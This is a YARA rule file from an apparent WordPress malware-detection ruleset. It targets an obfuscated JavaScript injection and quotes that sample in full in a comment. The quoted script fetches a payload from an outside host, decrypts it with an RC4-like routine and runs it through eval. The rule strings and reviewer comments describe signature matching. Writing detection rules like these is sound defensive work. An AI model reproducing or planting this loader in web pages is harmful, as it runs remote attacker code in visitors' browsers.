import "hash"
include "whitelist.yar"
/*
Managing WP Yara Ruleset - Javascript
*/
// Match var _LFKy="";function _wXPc(){function _udlzq(_VoGH,_FcGp){for(var _EAuys,_JQMP=[],_kfpw=(-94+94),_eDHv=(""),_jCxV=(-94+94);_jCxV<(243+13);_jCxV++)_JQMP[_jCxV]=_jCxV;for(_jCxV=(-94+94);_jCxV<(243+13);_jCxV++)_kfpw=(_kfpw+_JQMP[_jCxV]+_VoGH[("\u0063\u0068"+_LFKy+"\u0061"+_LFKy+"\u0072\u0043\u006f\u0064\u0065"+_LFKy+"\u0041"+_LFKy+"\u0074")](_jCxV%_VoGH[("\u006c\u0065\u006e\u0067\u0074"+_LFKy+"\u0068")]))%(243+13),_EAuys=_JQMP[_jCxV],_JQMP[_jCxV]=_JQMP[_kfpw],_JQMP[_kfpw]=_EAuys;for(var _DHxLD=_kfpw=_jCxV=(-94+94);_DHxLD<_FcGp[("\u006c\u0065\u006e\u0067\u0074"+_LFKy+"\u0068")];_DHxLD++)_kfpw=(_kfpw+_JQMP[_jCxV=(_jCxV+(-10+11))%(243+13)])%(243+13),_EAuys=_JQMP[_jCxV],_JQMP[_jCxV]=_JQMP[_kfpw],_JQMP[_kfpw]=_EAuys,_eDHv+=String[("\u0066"+_LFKy+"\u0072"+_LFKy+"\u006f\u006d"+_LFKy+"\u0043\u0068\u0061"+_LFKy+"\u0072\u0043\u006f"+_LFKy+"\u0064\u0065")](_FcGp[("\u0063\u0068"+_LFKy+"\u0061"+_LFKy+"\u0072\u0043\u006f\u0064\u0065"+_LFKy+"\u0041"+_LFKy+"\u0074")](_DHxLD)^_JQMP[(_JQMP[_jCxV]+_JQMP[_kfpw])%(243+13)]);return _eDHv}function _aXKB(){var _FcGp=(""),_EAuys=("\u0061\u0062\u0064\u0065\u0066\u0068\u0069\u006b\u006e\u0072\u0073"+_LFKy+"\u0074\u0079\u007a\u0031\u0032\u0033\u0034\u0035\u0036\u0037\u0038\u0039"+_LFKy+"\u0030"),_JQMP=_EAuys[("\u006c\u0065\u006e\u0067\u0074"+_LFKy+"\u0068")]-(-10+11);for(i=(-94+94);i<(-23+55);++i)position=window[("\u004d\u0061"+_LFKy+"\u0074"+_LFKy+"\u0068"+_LFKy+"")][("\u0066"+_LFKy+"\u006c\u006f\u006f\u0072")](window[("\u004d\u0061\u0074"+_LFKy+"\u0068")][("\u0072\u0061\u006e\u0064\u006f"+_LFKy+"\u006d")]()*_JQMP),_FcGp+=_EAuys[("\u0073"+_LFKy+"\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067")](position,position+(-10+11));return _FcGp}var _ACMD=_aXKB();var _NHxz=("\u0059"+_LFKy+"\u006a\u0038\u0070\u0046\u0059");function _DBOOO(_kfpw){var _JQMP=new 
XMLHttpRequest;_JQMP[("\u006f\u006e"+_LFKy+"\u0072\u0065"+_LFKy+"\u0061\u0064"+_LFKy+"\u0079\u0073\u0074\u0061"+_LFKy+"\u0074\u0065\u0063\u0068\u0061\u006e\u0067"+_LFKy+"\u0065")]=function(){var _kfpw;_JQMP[("\u0072\u0065"+_LFKy+"\u0061\u0064"+_LFKy+"\u0079\u0053\u0074\u0061\u0074\u0065")]==XMLHttpRequest[("\u0044\u004f\u004e"+_LFKy+"\u0045")]&&((199+1)!=_JQMP[("\u0073\u0074\u0061\u0074\u0075\u0073")]&&0x130!=_JQMP[("\u0073\u0074\u0061\u0074\u0075\u0073")]||("\u006e\u0075"+_LFKy+"\u006c\u006c")!==(_kfpw=(("")+_JQMP[("\u0072\u0065"+_LFKy+"\u0073\u0070\u006f\u006e\u0073\u0065\u0054"+_LFKy+"\u0065\u0078\u0074")])[("\u0073\u0070"+_LFKy+"\u006c\u0069"+_LFKy+"\u0074"+_LFKy+"")](_NHxz)[(-10+11)])&&void (-94+94)!==_kfpw&&("")!==_kfpw&&window[("\u0065\u0076\u0061\u006c"+_LFKy+"")](_udlzq(_ACMD,window[("\u0075\u006e\u0065\u0073\u0063\u0061\u0070\u0065")](_kfpw[("\u0072\u0065\u0070\u006c\u0061\u0063"+_LFKy+"\u0065")](new RegExp(_NHxz,("\u0067"+_LFKy+"")),("\u0025"+_LFKy+""))))))},_JQMP[("\u006f\u0070\u0065"+_LFKy+"\u006e")](("\u0047\u0045\u0054"),_kfpw,!(-94+94)),_JQMP[("\u0073"+_LFKy+"\u0065\u006e\u0064")](null)}var _ZtCBI=("\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0061"+_LFKy+"\u0077\u0073\u002d\u0077\u0077\u0063\u006c\u006f\u0075\u0064\u002e\u006e\u0065\u0074\u002f\u0061\u0073\u0079\u006e\u0063\u002f\u003f\u0069\u0064\u003d"+_LFKy+"")+_ACMD;("\u0075\u006e\u0064\u0065"+_LFKy+"\u0066\u0069"+_LFKy+"\u006e\u0065\u0064")!=typeof 
Storage&&("\u0063\u006c\u006f\u0075"+_LFKy+"\u0064"+_LFKy+"\u005f\u0075\u0075\u0069\u0064\u0035")!==window[("\u006c\u006f\u0063"+_LFKy+"\u0061\u006c\u0053\u0074\u006f\u0072\u0061\u0067\u0065"+_LFKy+"")][("\u0063\u006c\u006f"+_LFKy+"\u0075"+_LFKy+"\u0064\u005f"+_LFKy+"\u0075"+_LFKy+"\u0075\u0069\u0064\u0035"+_LFKy+"")]&&(window[("\u006c\u006f\u0063\u0061\u006c\u0053\u0074\u006f\u0072\u0061"+_LFKy+"\u0067\u0065")][("\u0073\u0065"+_LFKy+"\u0074\u0049\u0074\u0065\u006d")](("\u0063\u006c\u006f\u0075"+_LFKy+"\u0064"+_LFKy+"\u005f\u0075\u0075\u0069\u0064\u0035"),("\u0063\u006c\u006f\u0075"+_LFKy+"\u0064"+_LFKy+"\u005f\u0075\u0075\u0069\u0064\u0035")),_DBOOO(_ZtCBI))}_wXPc();
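rule windows_net_redirect_js_3 {
    meta:
        author = "Unknown"
        date = "2023-03-01"
        description = "Javascript redirect to windows.net"
        // NOTE(review): the sample quoted in the comment above decodes its beacon
        // URL (from the \u escapes) to https://aws-wwcloud.net/async/?id=, not a
        // windows.net host; confirm the description against the sample this rule
        // was cut from.
    strings:
        // Every fragment below is a verbatim slice of the obfuscated sample. The
        // identifier names (_LFKy, _wXPc, _udlzq, _aXKB, _DBOOO) come from one run
        // of the obfuscator, so a re-obfuscated copy with fresh names will not
        // match; treat this as a sample-specific signature, not a family rule.
        //
        // All fragments carry the same "ascii wide" modifiers on purpose: with
        // "all of them", an ascii-only string makes a wide match on any other
        // string irrelevant, which is what the original "wide ascii" on $func3
        // alone amounted to. Uniform modifiers also let the rule fire on a UTF-16
        // encoded copy of the script.

        // Entry of the decoder: a 256-round key-scheduling loop that looks like RC4.
        $s1 = "var _LFKy=\"\";function _wXPc(){function _udlzq(_VoGH,_FcGp){for(var _EAuys,_JQMP=[],_kfpw=(-94+94),_eDHv=(\"\")" ascii wide
        // Start of the per-run key generator (Math.random over a fixed alphabet).
        $s2 = "function _aXKB(){var _FcGp=(\"\")" ascii wide
        // Start of the XMLHttpRequest stage that fetches and eval()s the payload.
        // The former $s4 was a strict prefix of this string with weaker modifiers,
        // so under "all of them" it could never change the outcome; dropped.
        $func3 = "function _DBOOO(_kfpw){var _JQMP=new XMLHttpRequest;_JQMP[(" ascii wide
    condition:
        all of them
}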